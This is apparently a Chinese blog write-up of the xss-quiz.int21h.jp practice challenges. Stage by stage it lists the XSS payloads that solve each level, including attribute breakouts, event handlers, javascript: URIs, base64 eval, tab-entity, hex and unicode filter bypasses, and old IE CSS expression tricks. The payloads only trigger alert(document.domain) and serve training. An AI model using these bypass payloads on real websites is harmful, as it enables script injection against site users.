2020-01-02

环境:http://xss-quiz.int21h.jp

一、Stage #1 无过滤xss漏洞

1、随便输入字符:123

2、输入payload:<script>alert(document.domain)</script>

3、弹出对话框,说明存在xss漏洞

二、Stage #2 属性中的xss漏洞

1、在窗口中输入payload:<script>alert(document.domain)</script>,查看审查元素,payload被写在一个<input>标签中

2、重新构造payload,先闭合标签:

"><script>alert(document.domain)</script>

或者 "onmouseover=alert(document.domain)>

3、成功弹出

三、Stage #3 选择列表框中的xss漏洞

1、点击search,抓包

2、修改post数据,添加payload:<script>alert(document.domain);</script>,发送到repeater,send

3、右击响应信息,show response in browser,复制到浏览器打开


四、隐藏提交参数的xss漏洞

"><svg onload=alert(document.domain)>%0a

1、随便输入字符,search,抓包

2、在隐藏参数后面添加payload,forward,查看审查元素

3、闭合参数,重新构造payload:"><script>alert(document.domain);</script>,发包,成功弹出

五、HTML事件中的xss漏洞

1、直接输入payload:"><script>alert(document.domain);</script>,审查元素,字符被转义了,

2、重新构造payload:"onmouseover="alert(document.domain)

或者" onclick="alert(document.domain)"

3、成功弹出

六、空格分隔属性中的xss漏洞

1、随便输入字符111 222 333

2、输入字符串

3、构造payload:111 onclick=alert(document.domain),成功弹出

七、JavaScript为协议触发


1、输入payload:javascript:alert(document.domain),成功弹出

八、绕过过滤xss漏洞

1、输入payload:"><script>alert(document.domain);</script>,审查元素,domain被过滤了


2、重新构造payload:"><script>alert(document.dodomainmain);</script>

或者"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script>


九、绕过替换script和on事件的xss漏洞

1、输入<script>alert(document.dodomainmain);</script>,script被替换成xscript


2、闭合payload,并修改100" onmouseover="alert(document.domain)


on事件,被替换成onxxx

3、使用伪协议加“&#09”绕过

100"> <a href="javascr&#09ipt:alert(document.domain)">xss</a>

十、利用IE特性绕过过滤",``可以闭合双引号,

``onmousemove=alert(document.domain)

仅针对IE浏览器

十一、利用css特性绕过过滤",IE低版本

background-color:#f00;background:url("javascript:alert(document.domain);");


十二、利用css执行js

xss:expres/**/sion(if(!window.x){alert(document.domain);window.x=1;})


十三、十六进制绕过过滤

1、输入<script>alert(document.domain)</script>


2、<>都被转义了,用十六进制代替

\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

十四、unicode绕过过滤

1、输入\\x3c \\x3e,不能绕过

2、重新利用unicode构造payload:

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

禁止非法,后果自负

欢迎关注公众号:web安全工具库


©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 1 S型神经元 修改权重和偏置的微小改动只会引起输出的微小变化 S型神经元有多个输入,x1,x2,... , xi...
    闲后美梦阅读 462评论 0 0
  • 系统中有不同的用户时,我们可以用不同的身份登陆系统。 最费事的办法是退出系统,然后以另一用户的账号密码登陆。但是,...
    金石明镜阅读 674评论 0 0
  • 其实说实话呢,我并不是什么作家,甚至语文也不好,其实只是身边的事情太多了,我想写出来罢了。 第三中...
    还对你阅读 154评论 0 0
  • 过渡和动画 过渡 在CSS3引入transition之前css没有时间轴,所有的状态变化都是瞬间完成 transi...
    YQY_苑阅读 191评论 0 0
  • 井下世界 有着关于酒的传说 以及对酒强烈的向往 在那天 我对所有人宣布 我将离开这里去寻找酒 井下的世界沸腾了 有...
    伍丁零阅读 360评论 0 2

友情链接更多精彩内容